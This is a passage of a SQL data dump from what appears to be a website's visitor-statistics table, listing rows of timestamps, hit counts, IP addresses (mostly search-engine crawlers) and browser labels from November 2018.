6.13.169','other'),(334582,1542430338,1,1,0,0,'54.36.148.209','other'),(334583,1542430408,1,1,0,0,'54.36.148.250','other'),(334584,1542430496,1,1,0,0,'52.205.137.226','firefox'),(334585,1542430497,1,1,0,0,'18.207.223.37','firefox'),(334586,1542430601,2,2,0,0,'95.213.141.126','opera'),(334587,1542430792,2,2,0,0,'91.196.178.131','firefox'),(334588,1542430893,1,1,0,0,'54.36.149.28','other'),(334589,1542430954,1,1,0,0,'54.36.149.60','other'),(334590,1542431051,1,1,0,0,'8.29.198.25','other'),(334591,1542431066,2,2,0,0,'46.229.168.137','other'),(334592,1542431068,1,1,0,0,'46.229.168.147','other'),(334593,1542431157,1,1,0,0,'54.36.148.244','other'),(334594,1542431373,1,1,0,0,'54.36.148.198','other'),(334595,1542431498,1,1,0,0,'54.36.149.71','other'),(334596,1542431627,1,1,0,0,'8.29.198.27','other'),(334597,1542431911,8,8,0,0,'66.249.66.40','chrome'),(334598,1542431999,1,1,0,0,'66.249.66.156','chrome'),(334599,1542432000,1,1,0,0,'66.249.66.154','chrome'),(334600,1542432160,1,1,0,0,'207.46.13.169','other'),(334601,1542432169,5,5,0,0,'66.249.66.42','chrome'),(334602,1542432242,1,1,0,0,'66.249.66.44','chrome'),(334603,1542432316,1,1,0,0,'54.36.148.138','other'),(334604,1542432469,1,1,0,0,'54.36.148.37','other'),(334605,1542432501,1,1,0,0,'54.36.148.222','other'),(334606,1542432748,1,1,0,0,'54.36.148.228','other'),(334607,1542433115,5,5,0,0,'216.244.66.241','other'),(334608,1542433437,2,2,0,0,'46.211.118.79','chrome'),(334609,1542433709,1,1,0,0,'54.36.148.174','other'),(334610,1542433733,1,1,0,0,'46.229.168.152','other'),(334611,1542433897,1,1,0,0,'54.36.148.31','other'),(334612,1542433974,1,1,0,0,'157.55.39.212','other'),(334613,1542434064,1,1,0,0,'207.46.13.172','other'),(334614,1542434552,1,1,0,0,'54.36.149.33','other'),(334615,1542434702,1,1,0,0,'54.36.148.29','other'),(334616,1542434903,3,3,0,0,'216.244.66.241','other'),(334617,1542435028,1,1,0,0,'54.36.148.152','other'),(334618,1542435035,1,1,0,0,'46.229.168.130','other'),(334619,1542435039,1,1,0,0,'46.229.168.146','other'),(334620,1542435124,1,1,0,0,'54.36.148.97','other'),(334621,1542435169,1,1,0,0,'54.36.149.104','other'),(334622,1542435298,1,1,0,0,'207.46.13.172','other'),(334623,1542435351,1,1,0,0,'54.36.148.128','other'),(334624,1542435391,1,1,0,0,'46.229.168.152','other'),(334625,1542435399,1,1,0,0,'46.229.168.147','other'),(334626,1542435459,1,1,0,0,'54.36.149.73','other'),(334627,1542435605,1,1,0,0,'54.36.148.179','other'),(334628,1542435820,1,1,0,0,'207.46.13.231','other'),(334629,1542436118,1,1,0,0,'54.36.149.43','other'),(334630,1542436366,1,1,0,0,'40.77.167.192','other'),(334631,1542436495,1,1,0,0,'178.154.244.29','other'),(334632,1542436569,1,1,0,0,'46.229.168.134','other'),(334633,1542436604,1,1,0,0,'54.36.148.208','other'),(334634,1542436632,1,1,0,0,'178.255.215.94','other'),(334635,1542436664,2,2,0,0,'207.46.13.224','other'),(334636,1542437075,2,2,0,0,'95.163.255.96','other'),(334637,1542437478,1,1,0,0,'54.36.148.214','other'),(334638,1542437639,1,1,0,0,'207.46.13.172','other'),(334639,1542438036,1,1,0,0,'46.211.55.76','chrome'),(334640,1542438203,1,1,0,0,'66.249.66.40','chrome'),(334641,1542438264,3,3,0,0,'216.244.66.241','other'),(334642,1542438944,2,2,0,0,'46.211.9.171','chrome'),(334643,1542438976,1,1,0,0,'66.249.66.157','chrome'),(334644,1542438983,1,1,0,0,'66.249.66.152','chrome'),(334645,1542439025,1,1,0,0,'54.36.149.37','other'),(334646,1542439079,1,1,0,0,'207.46.13.169','other'),(334647,1542439354,1,1,0,0,'216.244.66.241','other'),(334648,1542439705,1,1,0,0,'46.229.168.140','other'),(334649,1542439707,1,1,0,0,'46.229.168.142','other'),(334650,1542439913,1,1,0,0,'54.36.149.10','other'),(334651,1542440025,1,1,0,0,'207.46.13.169','other'),(334652,1542440119,1,1,0,0,'54.36.148.118','other'),(334653,1542440302,2,2,0,0,'66.249.66.154','chrome'),(334654,1542440309,1,1,0,0,'54.36.148.131','other'),(334655,1542440331,1,1,0,0,'8.29.198.25','other'),(334656,1542440457,1,1,0,0,'54.36.148.237','other'),(334657,1542440491,1,1,0,0,'54.36.149.93','other'),(334658,1542440495,1,1,0,0,'54.36.148.151','other'),(334659,1542440528,1,1,0,0,'207.46.13.172','other'),(334660,1542440574,1,1,0,0,'66.249.66.155','chrome'),(334661,1542440581,2,2,0,0,'216.244.66.241','other'),(334662,1542440659,1,1,0,0,'54.36.149.62','other'),(334663,1542440930,1,1,0,0,'54.36.148.112','other'),(334664,1542441105,1,1,0,0,'66.249.66.44','chrome'),(334665,1542441538,1,1,0,0,'157.55.39.212','other'),(334666,1542441565,1,1,0,0,'54.36.148.36','other'),(334667,1542441590,2,2,0,0,'46.211.111.141','chrome'),(334668,1542441679,1,1,0,0,'54.36.148.167','other'),(334669,1542441719,1,1,0,0,'54.36.148.206','other'),(334670,1542441731,1,1,0,0,'54.36.148.147','other'),(334671,1542441782,1,1,0,0,'54.36.148.135','other'),(334672,1542441802,1,1,0,0,'207.46.13.172','other'),(334673,1542441898,1,1,0,0,'8.29.198.27','other'),(334674,1542441946,2,2,0,0,'207.46.13.207','other'),(334675,1542441999,18,18,0,0,'178.154.244.11','other'),(334676,1542442038,5,5,0,0,'141.8.142.103','other'),(334677,1542442049,13,13,0,0,'178.154.244.29','other'),(334678,1542442082,1,1,0,0,'207.46.13.169','other'),(334679,1542442147,4,4,0,0,'5.45.207.79','other'),(334680,1542442267,1,1,0,0,'54.36.148.183','other'),(334681,1542442461,1,1,0,0,'8.29.198.25','other'),(334682,1542442514,1,1,0,0,'54.36.148.78','other'),(334683,1542442595,1,1,0,0,'178.154.171.27','other'),(334684,1542442598,2,2,0,0,'213.180.203.17','other'),(334685,1542442702,2,2,0,0,'66.249.66.156','chrome'),(334686,1542442716,1,1,0,0,'37.9.113.148','other'),(334687,1542442865,1,1,0,0,'178.154.200.48','other'),(334688,1542442930,10,10,0,0,'178.154.244.11','other'),(334689,1542442967,7,7,0,0,'178.154.244.29','other'),(334690,1542442998,1,1,0,0,'66.249.66.57','chrome'),(334691,1542442999,1,1,0,0,'66.249.66.42','chrome'),(334692,1542443068,1,1,0,0,'37.9.113.20','other'),(334693,1542443077,1,1,0,0,'141.8.142.103','other'),(334694,1542443110,1,1,0,0,'54.36.148.59','other'),(334695,1542443152,1,1,0,0,'54.36.148.73','other'),(334696,1542443402,3,3,0,0,'216.244.66.241','other'),(334697,1542443538,1,1,0,0,'5.45.207.19','other'),(334698,1542443546,1,1,0,0,'87.250.224.47','other'),(334699,1542443903,1,1,0,0,'207.46.13.172','other'),(334700,1542443922,1,1,0,0,'207.46.13.224','other'),(334701,1542443956,1,1,0,0,'66.249.66.157','chrome'),(334703,1542444067,1,1,0,0,'46.229.168.132','other'),(334704,1542444325,1,1,0,0,'54.36.148.158','other'),(334705,1542444500,1,1,0,0,'54.36.148.185','other'),(334706,1542444638,1,1,0,0,'54.36.149.72','other'),(334707,1542445231,2,2,0,0,'66.249.66.156','chrome'),(334708,1542445243,1,1,0,0,'54.36.148.177','other'),(334709,1542445286,4,4,0,0,'216.244.66.241','other'),(334710,1542445287,1,1,0,0,'54.36.149.20','other'),(334711,1542445413,1,1,0,0,'134.249.238.1','firefox'),(334712,1542445437,1,1,0,0,'54.36.149.37','other'),(334713,1542445527,1,1,0,0,'54.36.148.147','other'),(334714,1542445839,1,1,0,0,'94.179.227.43','chrome'),(334715,1542445858,1,1,0,0,'46.229.168.137','other'),(334716,1542445861,2,2,0,0,'46.229.168.147','other'),(334717,1542445972,1,1,0,0,'95.163.255.67','other'),(334718,1542445975,1,1,0,0,'95.163.255.64','other'),(334719,1542446162,1,1,0,0,'54.36.148.229','other'),(334720,1542446212,1,1,0,0,'54.36.149.69','other'),(334721,1542446461,2,2,0,0,'66.249.66.42','chrome'),(334722,1542446617,1,1,0,0,'54.36.149.85','other'),(334723,1542446982,1,1,0,0,'54.36.149.66','other'),(334724,1542447055,1,1,0,0,'54.36.149.18','other'),(334725,1542447072,2,2,0,0,'66.249.66.152','chrome'),(334726,1542447229,1,1,0,0,'54.36.148.238','other'),(334727,1542447231,2,2,0,0,'77.122.73.156','firefox'),(334728,1542447312,1,1,0,0,'54.36.148.174','other'),(334729,1542447380,1,1,0,0,'194.44.253.140','other'),(334730,1542447647,1,1,0,0,'54.36.149.68','other'),(334731,1542447697,1,1,0,0,'66.249.66.157','chrome'),(334732,1542447733,1,1,0,0,'54.36.149.43','other'),(334733,1542448163,1,1,0,0,'66.249.66.152','chrome'),(334734,1542448365,1,1,0,0,'54.36.148.203','other'),(334735,1542448413,2,2,0,0,'46.211.111.141','chrome'),(334736,1542448417,1,1,0,0,'54.36.148.40','other'),(334737,1542448597,1,1,0,0,'66.249.66.61','chrome'),(334738,1542448598,1,1,0,0,'66.249.66.44','chrome'),(334739,1542448651,1,1,0,0,'216.244.66.241','other'),(334740,1542449311,1,1,0,0,'54.36.148.159','other'),(334741,1542449370,1,1,0,0,'91.196.178.130','chrome'),(334742,1542449463,1,1,0,0,'178.154.244.29','other'),(334743,1542449515,1,1,0,0,'180.76.15.29','other'),(334744,1542450691,1,1,0,0,'54.36.148.94','other'),(334745,1542450741,2,2,0,0,'216.244.66.241','other'),(334746,1542450776,1,1,0,0,'207.46.13.172','other'),(334747,1542450826,1,1,0,0,'66.249.66.40','chrome'),(334748,1542450852,1,1,0,0,'54.36.149.71','other'),(334749,1542450915,1,1,0,0,'46.229.168.151','other'),(334750,1542451028,1,1,0,0,'54.36.148.177','other'),(334751,1542451185,1,1,0,0,'8.29.198.27','other'),(334752,1542451225,1,1,0,0,'54.36.148.169','other'),(334753,1542451485,1,1,0,0,'66.249.66.152','chrome'),(334754,1542451516,1,1,0,0,'180.76.15.34','other'),(334755,1542452126,1,1,0,0,'54.36.148.237','other'),(334756,1542452217,1,1,0,0,'46.229.168.148','other'),(334757,1542452271,1,1,0,0,'46.229.168.135','other'),(334758,1542452273,1,1,0,0,'46.229.168.140','other'),(334759,1542452421,1,1,0,0,'46.229.168.129','other'),(334760,1542452737,1,1,0,0,'8.29.198.25','other'),(334761,1542452921,3,3,0,0,'216.244.66.241','other'),(334762,1542452993,1,1,0,0,'54.36.148.226','other'),(334763,1542452996,1,1,0,0,'207.46.13.172','other'),(334764,1542453078,1,1,0,0,'54.36.148.73','other'),(334765,1542453298,1,1,0,0,'8.29.198.27','other'),(334766,1542453356,1,1,0,0,'54.36.148.234','other'),(334767,1542453464,1,1,0,0,'54.36.148.119','other'),(334768,1542453466,2,2,0,0,'46.211.110.196','chrome'),(334769,1542453510,1,1,0,0,'54.36.148.212','other'),(334770,1542453514,1,1,0,0,'180.76.15.28','other'),(334771,1542453515,1,1,0,0,'180.76.15.157','other'),(334772,1542453616,1,1,0,0,'54.36.148.215','other'),(334773,1542453798,1,1,0,0,'66.249.66.61','chrome'),(334774,1542453799,1,1,0,0,'66.249.66.42','chrome'),(334775,1542453888,1,1,0,0,'54.36.148.80','other'),(334776,1542454071,1,1,0,0,'54.36.148.109','other'),(334777,1542454151,1,1,0,0,'37.53.125.42','opera'),(334778,1542454421,1,1,0,0,'54.36.149.73','other'),(334779,1542454496,1,1,0,0,'207.46.13.207','other'),(334780,1542454618,2,2,0,0,'207.46.13.169','other'),(334781,1542454848,1,1,0,0,'54.36.148.128','other'),(334782,1542454883,1,1,0,0,'157.55.39.212','other'),(334783,1542454886,1,1,0,0,'46.229.168.130','other'),(334784,1542454904,1,1,0,0,'77.88.207.114','opera'),(334785,1542455052,1,1,0,0,'40.77.167.205','other'),(334786,1542455056,1,1,0,0,'40.77.167.197','other'),(334787,1542455057,1,1,0,0,'46.229.168.149','other'),(334788,1542455283,6,6,0,0,'216.244.66.241','other'),(334789,1542455321,1,1,0,0,'77.88.207.114','firefox'),(334790,1542455487,1,1,0,0,'54.36.148.89','other'),(334791,1542455598,1,1,0,0,'207.46.13.207','other'),(334792,1542455773,1,1,0,0,'54.36.149.32','other'),(334793,1542455817,1,1,0,0,'54.36.148.67','other'),(334794,1542455859,1,1,0,0,'54.36.148.217','other'),(334795,1542455915,1,1,0,0,'54.36.148.179','other'),(334796,1542456001,1,1,0,0,'66.249.66.156','chrome'),(334797,1542456002,1,1,0,0,'66.249.66.152','chrome'),(334798,1542456375,1,1,0,0,'54.36.148.226','other'),(334799,1542456417,1,1,0,0,'207.46.13.172','other'),(334800,1542456450,1,1,0,0,'54.36.148.112','other'),(334801,1542456701,1,1,0,0,'66.249.66.42','chrome'),(334802,1542456929,1,1,0,0,'66.249.66.157','chrome'),(334803,1542456930,1,1,0,0,'66.249.66.154','chrome'),(334804,1542457112,1,1,0,0,'54.36.148.108','other'),(334805,1542457356,2,2,0,0,'91.209.11.236','other'),(334806,1542457414,1,1,0,0,'54.36.148.182','other'),(334807,1542457516,13,13,0,0,'178.154.244.11','other'),(334808,1542457547,1,1,0,0,'54.36.148.17','other'),(334809,1542457576,6,6,0,0,'5.45.207.79','other'),(334810,1542457581,28,28,0,0,'178.154.244.29','other'),(334811,1542457791,1,1,0,0,'95.108.213.4','other'),(334812,1542457796,2,2,0,0,'141.8.142.103','other'),(334813,1542457820,1,1,0,0,'54.36.148.240','other'),(334814,1542457859,4,4,0,0,'5.45.207.19','other'),(334815,1542457867,1,1,0,0,'207.46.13.172','other'),(334816,1542457899,1,1,0,0,'54.36.148.138','other'),(334817,1542458118,1,1,0,0,'54.36.148.77','other'),(334818,1542458299,1,1,0,0,'54.36.148.12','other'),(334819,1542458326,1,1,0,0,'54.36.148.75','other'),(334820,1542458450,1,1,0,0,'87.250.224.118','other'),(334821,1542458465,1,1,0,0,'95.108.181.75','other'),(334822,1542458495,5,5,0,0,'178.154.244.11','other'),(334823,1542458569,1,1,0,0,'54.36.148.135','other'),(334824,1542458601,10,10,0,0,'178.154.244.29','other'),(334825,1542458675,1,1,0,0,'87.250.224.47','other'),(334826,1542458698,1,1,0,0,'54.36.148.230','other'),(334827,1542458799,1,1,0,0,'54.36.148.15','other'),(334828,1542458953,1,1,0,0,'46.229.168.129','other'),(334829,1542458956,1,1,0,0,'46.229.168.139','other'),(334830,1542458959,1,1,0,0,'54.36.149.101','other'),(334831,1542459436,1,1,0,0,'54.36.149.89','other'),(334832,1542459525,1,1,0,0,'178.154.244.29','other'),(334833,1542459809,1,1,0,0,'207.46.13.169','other'),(334834,1542460354,1,1,0,0,'54.36.149.29','other'),(334835,1542460502,1,1,0,0,'54.36.148.110','other'),(334836,1542460722,1,1,0,0,'95.132.22.201','chrome'),(334837,1542460742,6,6,0,0,'216.244.66.241','other'),(334838,1542460881,1,1,0,0,'46.229.168.148','other'),(334839,1542460884,1,1,0,0,'46.229.168.140','other'),(334840,1542460955,1,1,0,0,'93.78.185.80','chrome'),(334841,1542461243,1,1,0,0,'95.46.140.61','firefox'),(334842,1542461410,1,1,0,0,'54.36.149.50','other'),(334843,1542461451,1,1,0,0,'207.46.13.207','other'),(334844,1542461659,1,1,0,0,'46.229.168.149','other'),(334845,1542461661,1,1,0,0,'46.229.168.150','other'),(334846,1542461774,1,1,0,0,'54.36.148.35','other'),(334847,1542461832,1,1,0,0,'54.36.149.86','other'),(334848,1542462027,1,1,0,0,'8.29.198.25','other'),(334849,1542462162,1,1,0,0,'46.229.168.151','other'),(334850,1542462505,1,1,0,0,'54.36.148.139','other'),(334851,1542462604,1,1,0,0,'54.36.149.46','other'),(334852,1542462869,1,1,0,0,'207.46.13.172','other'),(334853,1542462978,1,1,0,0,'46.229.168.140','other'),(334854,1542462980,1,1,0,0,'46.229.168.130','other'),(334855,1542462988,1,1,0,0,'46.229.168.133','other'),(334856,1542463033,1,1,0,0,'54.36.148.12','other'),(334857,1542463039,1,1,0,0,'54.36.149.68','other'),(334858,1542463206,1,1,0,0,'66.249.66.152','chrome'),(334859,1542463328,1,1,0,0,'216.244.66.241','other'),(334860,1542463368,1,1,0,0,'46.229.168.142','other'),(334861,1542463517,1,1,0,0,'54.36.149.58','other'),(334862,1542463581,2,2,0,0,'8.29.198.27','other'),(334863,1542463665,1,1,0,0,'54.36.148.57','other'),(334864,1542463824,1,1,0,0,'54.36.148.115','other'),(334865,1542463829,1,1,0,0,'157.55.39.212','other'),(334866,1542463846,1,1,0,0,'54.36.148.10','other'),(334867,1542463952,1,1,0,0,'54.36.148.83','other'),(334868,1542464332,1,1,0,0,'54.36.148.80','other'),(334869,1542464613,1,1,0,0,'54.36.149.1','other'),(334870,1542464714,3,3,0,0,'178.154.244.29','other'),(334871,1542464752,1,1,0,0,'207.46.13.169','other'),(334872,1542464805,1,1,0,0,'207.46.13.207','other'),(334873,1542465244,1,1,0,0,'95.108.213.4','other'),(334874,1542465249,1,1,0,0,'178.154.244.11','other'),(334875,1542465294,1,1,0,0,'54.36.148.94','other'),(334876,1542465466,1,1,0,0,'54.36.148.220','other'),(334877,1542465473,6,6,0,0,'216.244.66.241','other'),(334878,1542465475,1,1,0,0,'54.36.149.0','other'),(334879,1542465628,1,1,0,0,'54.36.148.121','other'),(334880,1542465637,1,1,0,0,'66.249.66.155','chrome'),(334881,1542465638,2,2,0,0,'66.249.66.152','chrome'),(334882,1542465673,1,1,0,0,'66.249.66.156','chrome'),(334883,1542465676,1,1,0,0,'54.36.148.222','other'),(334884,1542465874,1,1,0,0,'54.36.149.43','other'),(334885,1542466001,1,1,0,0,'46.229.168.149','other'),(334886,1542466111,1,1,0,0,'46.229.168.141','other'),(334887,1542466121,1,1,0,0,'46.229.168.134','other'),(334888,1542466123,1,1,0,0,'46.229.168.144','other'),(334889,1542466601,1,1,0,0,'216.244.66.241','other'),(334890,1542467084,1,1,0,0,'54.36.148.93','other'),(334891,1542467331,1,1,0,0,'157.55.39.212','other'),(334892,1542467389,1,1,0,0,'46.229.168.130','other'),(334893,1542467392,1,1,0,0,'46.229.168.137','other'),(334894,1542467577,1,1,0,0,'54.36.149.63','other'),(334895,1542467580,1,1,0,0,'54.36.148.17','other'),(334896,1542467594,1,1,0,0,'54.36.148.253','other'),(334897,1542467762,1,1,0,0,'207.46.13.231','other'),(334898,1542468029,5,5,0,0,'216.244.66.241','other'),(334899,1542468087,1,1,0,0,'95.163.255.112','other'),(334900,1542468099,2,2,0,0,'95.163.255.115','other'),(334901,1542468111,1,1,0,0,'95.163.255.117','other'),(334902,1542468115,1,1,0,0,'95.163.255.118','other'),(334903,1542468121,1,1,0,0,'95.163.255.119','other'),(334904,1542468126,1,1,0,0,'95.163.255.103','other'),(334905,1542468137,1,1,0,0,'95.163.255.114','other'),(334906,1542468247,1,1,0,0,'54.36.148.43','other'),(334907,1542468461,1,1,0,0,'54.36.148.134','other'),(334908,1542468497,1,1,0,0,'46.229.168.130','other'),(334909,1542468500,1,1,0,0,'46.229.168.141','other'),(334910,1542468729,1,1,0,0,'207.46.13.169','other'),(334911,1542468783,1,1,0,0,'54.36.148.138','other'),(334912,1542468949,1,1,0,0,'5.58.105.201','msie'),(334913,1542469033,1,1,0,0,'216.244.66.241','other'),(334914,1542469584,1,1,0,0,'46.229.168.133','other'),(334915,1542469746,3,3,0,0,'46.133.231.2','chrome'),(334916,1542470040,1,1,0,0,'54.36.149.1','other'),(334917,1542470050,1,1,0,0,'157.55.39.212','other'),(334918,1542470315,1,1,0,0,'66.249.66.156','chrome'),(334919,1542470316,1,1,0,0,'66.249.66.152','chrome'),(334920,1542470398,1,1,0,0,'54.36.149.12','other'),(334921,1542470489,1,1,0,0,'54.36.148.242','other'),(334922,1542470527,1,1,0,0,'220.243.135.141','chrome'),(334923,1542470663,1,1,0,0,'46.229.168.146','other'),(334924,1542470921,2,2,0,0,'188.163.5.19','chrome'),(334925,1542470925,3,3,0,0,'216.244.66.241','other'),(334926,1542471114,1,1,0,0,'54.36.149.86','other'),(334927,1542471199,1,1,0,0,'54.36.149.40','other'),(334928,1542471310,1,1,0,0,'54.36.149.102','other'),(334929,1542471382,1,1,0,0,'207.46.13.169','other'),(334930,1542471405,1,1,0,0,'66.249.66.154','chrome'),(334931,1542471534,1,1,0,0,'54.36.148.239','other'),(334932,1542471571,1,1,0,0,'54.36.148.50','other'),(334933,1542471807,1,1,0,0,'54.36.148.152','other'),(334934,1542472063,1,1,0,0,'13.66.139.0','other'),(334935,1542472344,1,1,0,0,'54.36.148.238','other'),(334936,1542472415,2,2,0,0,'46.211.120.178','chrome'),(334937,1542472565,1,1,0,0,'54.36.148.102','other'),(334938,1542472732,3,3,0,0,'66.249.66.152','chrome'),(334939,1542472842,2,2,0,0,'66.249.66.155','chrome'),(334940,1542472872,1,1,0,0,'8.29.198.25','other'),(334941,1542472918,1,1,0,0,'54.36.148.144','other'),(334942,1542473107,1,1,0,0,'54.36.148.13','other'),(334943,1542473157,1,1,0,0,'54.36.148.242','other'),(334944,1542473182,1,1,0,0,'54.36.149.50','other'),(334945,1542473185,1,1,0,0,'54.36.148.190','other'),(334946,1542473260,2,2,0,0,'178.154.244.11','other'),(334947,1542473264,2,2,0,0,'178.154.244.29','other'),(334948,1542473380,1,1,0,0,'66.249.66.154','chrome'),(334949,1542473432,1,1,0,0,'157.55.39.212','other'),(334950,1542473468,1,1,0,0,'54.36.148.110','other'),(334951,1542473653,1,1,0,0,'54.36.148.104','other'),(334952,1542473751,7,7,0,0,'216.244.66.241','other'),(334953,1542474218,1,1,0,0,'54.36.148.253','other'),(334954,1542474355,1,1,0,0,'54.36.148.36','other'),(334955,1542474413,1,1,0,0,'8.29.198.27','other'),(334956,1542474492,1,1,0,0,'54.36.148.154','other'),(334957,1542474523,1,1,0,0,'207.46.13.231','other'),(334958,1542474588,3,3,0,0,'66.249.66.156','chrome'),(334959,1542474611,1,1,0,0,'46.229.168.141','other'),(334960,1542474613,1,1,0,0,'46.229.168.147','other'),(334961,1542474772,1,1,0,0,'66.249.66.154','chrome'),(334962,1542474794,1,1,0,0,'54.36.148.194','other'),(334963,1542474969,1,1,0,0,'8.29.198.25','other'),(334964,1542475131,1,1,0,0,'54.36.149.95','other'),(334965,1542475364,2,2,0,0,'207.46.13.169','other'),(334966,1542475656,1,1,0,0,'66.249.66.152','chrome'),(334967,1542475688,1,1,0,0,'54.36.149.27','other'),(334968,1542475797,4,4,0,0,'216.244.66.241','other'),(334969,1542476304,1,1,0,0,'66.249.66.156','chrome'),(334970,1542476334,1,1,0,0,'66.249.66.154','chrome'),(334971,1542477157,1,1,0,0,'54.36.148.16','other'),(334972,1542477223,1,1,0,0,'54.36.148.131','other'),(334973,1542477300,1,1,0,0,'54.36.149.83','other'),(334974,1542477336,1,1,0,0,'66.249.66.154','chrome'),(334975,1542477503,1,1,0,0,'54.36.148.89','other'),(334976,1542477761,1,1,0,0,'54.36.148.136','other'),(334977,1542477836,1,1,0,0,'157.55.39.212','other'),(334978,1542477948,1,1,0,0,'54.36.149.76','other'),(334979,1542478022,1,1,0,0,'54.36.149.36','other'),(334980,1542478039,1,1,0,0,'54.36.148.240','other'),(334981,1542478103,11,11,0,0,'216.244.66.241','other'),(334982,1542478112,1,1,0,0,'46.229.168.153','other'),(334984,1542478208,1,1,0,0,'54.36.149.32','other'),(334985,1542478234,1,1,0,0,'54.36.148.128','other'),(334986,1542478283,1,1,0,0,'46.229.168.134','other'),(334987,1542478287,1,1,0,0,'207.46.13.207','other'),(334988,1542478453,1,1,0,0,'54.36.149.60','other'),(334989,1542478469,1,1,0,0,'54.36.149.90','other'),(334990,1542478861,1,1,0,0,'54.36.148.225','other'),(334991,1542479348,1,1,0,0,'5.58.95.49','opera'),(334992,1542479462,1,1,0,0,'46.229.168.153','other'),(334993,1542479980,1,1,0,0,'66.249.66.59','chrome'),(334994,1542479981,1,1,0,0,'66.249.66.40','chrome'),(334995,1542480042,1,1,0,0,'66.249.66.156','chrome'),(334996,1542480044,1,0,1,0,'66.249.66.42',''),(334997,1542480426,1,1,0,0,'54.36.148.144','other'),(334998,1542480491,1,1,0,0,'54.36.148.235','other'),(334999,1542480858,1,1,0,0,'46.229.168.151','other'),(335000,1542480876,1,1,0,0,'54.36.148.137','other'),(335001,1542480905,1,1,0,0,'207.46.13.172','other'),(335002,1542480964,6,6,0,0,'216.244.66.241','other'),(335003,1542481078,2,2,0,0,'66.249.66.155','chrome'),(335004,1542481079,1,1,0,0,'66.249.66.156','chrome'),(335005,1542481417,1,1,0,0,'66.249.66.154','chrome'),(335006,1542481480,1,1,0,0,'46.229.168.150','other'),(335007,1542481484,2,2,0,0,'46.229.168.129','other'),(335008,1542481616,1,1,0,0,'66.249.66.152','chrome'),(335009,1542481790,1,1,0,0,'54.36.148.171','other'),(335010,1542482022,1,1,0,0,'54.36.148.16','other'),(335011,1542482201,1,1,0,0,'54.36.148.247','other'),(335012,1542482243,1,1,0,0,'207.46.13.169','other'),(335013,1542482511,1,1,0,0,'13.66.139.0','other'),(335014,1542482535,1,1,0,0,'46.229.168.144','other'),(335015,1542482538,1,1,0,0,'46.229.168.139','other'),(335016,1542482758,1,1,0,0,'207.46.13.172','other'),(335017,1542482896,1,1,0,0,'54.36.148.51','other'),(335018,1542482933,1,1,0,0,'54.36.148.129','other'),(335019,1542483142,1,1,0,0,'54.36.148.236','other'),(335020,1542483416,1,1,0,0,'54.36.148.24','other'),(335021,1542483616,3,3,0,0,'216.244.66.241','other'),(335022,1542483719,1,1,0,0,'8.29.198.26','other'),(335023,1542483872,1,1,0,0,'54.36.148.37','other'),(335024,1542484098,1,1,0,0,'66.249.66.57','chrome'),(335025,1542484099,2,2,0,0,'66.249.66.44','chrome'),(335026,1542484276,2,2,0,0,'66.249.66.156','chrome'),(335027,1542484342,1,1,0,0,'66.249.66.42','chrome'),(335028,1542484349,1,1,0,0,'66.249.66.154','chrome'),(335029,1542484497,1,1,0,0,'54.36.148.253','other'),(335030,1542484541,1,1,0,0,'46.229.168.153','other'),(335031,1542484831,1,1,0,0,'54.36.148.16','other'),(335032,1542484937,1,1,0,0,'168.228.8.30','firefox'),(335033,1542485060,1,1,0,0,'207.46.13.169','other'),(335034,1542485251,2,2,0,0,'8.29.198.27','other'),(335035,1542485252,1,1,0,0,'54.36.148.25','other'),(335036,1542485279,102,102,0,0,'69.30.202.138','other'),(335037,1542485595,1,1,0,0,'66.249.66.154','chrome'),(335038,1542485949,1,1,0,0,'54.36.148.107','other'),(335039,1542485957,1,1,0,0,'54.36.148.227','other'),(335040,1542485994,1,1,0,0,'46.229.168.143','other'),(335041,1542486007,8,8,0,0,'66.249.66.42','chrome'),(335042,1542486097,4,4,0,0,'216.244.66.241','other'),(335043,1542486124,2,2,0,0,'66.249.66.44','chrome'),(335044,1542486192,34,34,0,0,'66.249.66.40','chrome'),(335045,1542486223,1,1,0,0,'194.44.253.140','chrome'),(335046,1542486822,1,1,0,0,'54.36.148.12','other'),(335047,1542486920,2,2,0,0,'66.249.66.42','chrome'),(335048,1542487096,1,1,0,0,'54.36.148.201','other'),(335049,1542487217,1,1,0,0,'54.36.149.1','other'),(335050,1542487321,1,1,0,0,'54.36.148.24','other'),(335051,1542487782,2,2,0,0,'66.249.66.40','chrome'),(335052,1542487882,1,1,0,0,'54.36.148.91','other'),(335053,1542488059,1,1,0,0,'54.36.148.183','other'),(335054,1542488077,1,1,0,0,'194.44.253.140','chrome'),(335055,1542488090,1,1,0,0,'91.124.25.220','chrome'),(335056,1542488361,6,6,0,0,'178.154.244.11','other'),(335057,1542488577,21,21,0,0,'178.154.244.29','other'),(335058,1542488637,1,1,0,0,'66.249.66.157','chrome'),(335060,1542488728,4,4,0,0,'216.244.66.241','other'),(335061,1542488821,1,1,0,0,'66.249.66.57','chrome'),(335062,1542488822,1,1,0,0,'66.249.66.40','chrome'),(335063,1542489316,1,1,0,0,'37.9.113.148','other'),(335064,1542489325,3,3,0,0,'5.45.207.79','other'),(335065,1542489377,4,4,0,0,'178.154.244.11','other'),(335066,1542489433,1,1,0,0,'54.36.148.203','other'),(335067,1542489506,1,1,0,0,'54.36.149.27','other'),(335068,1542489524,1,1,0,0,'54.36.148.117','other'),(335069,1542489694,1,1,0,0,'216.244.66.241','other'),(335070,1542489744,10,10,0,0,'178.154.244.29','other'),(335071,1542489925,1,1,0,0,'54.36.148.115','other'),(335072,1542489969,1,1,0,0,'46.229.168.138','other'),(335073,1542490148,1,1,0,0,'54.36.148.26','other'),(335074,1542490327,6,6,0,0,'178.154.244.11','other'),(335075,1542490618,2,2,0,0,'66.249.66.156','chrome'),(335076,1542490696,3,3,0,0,'178.154.244.29','other'),(335077,1542490870,1,1,0,0,'141.8.142.103','other'),(335078,1542490917,1,1,0,0,'207.46.13.238','other'),(335079,1542491075,2,2,0,0,'66.249.66.44','chrome'),(335080,1542491266,1,1,0,0,'66.249.66.61','chrome'),(335081,1542491274,4,4,0,0,'178.154.244.11','other'),(335082,1542491341,3,3,0,0,'216.244.66.241','other'),(335083,1542491392,3,3,0,0,'66.249.66.42','chrome'),(335084,1542491393,2,2,0,0,'5.9.156.20','other'),(335085,1542491414,1,1,0,0,'66.249.66.157','chrome'),(335086,1542491440,1,1,0,0,'54.36.148.177','other'),(335087,1542491513,1,1,0,0,'54.36.148.76','other'),(335088,1542491727,4,4,0,0,'144.76.120.197','other'),(335089,1542491887,5,5,0,0,'178.154.244.29','other'),(335090,1542491920,2,2,0,0,'66.249.66.155','chrome'),(335091,1542491922,3,2,1,0,'66.249.66.156',''),(335092,1542491925,1,1,0,0,'95.216.5.212','other'),(335093,1542491952,1,1,0,0,'66.249.66.154','chrome'),(335094,1542491967,1,1,0,0,'46.229.168.151','o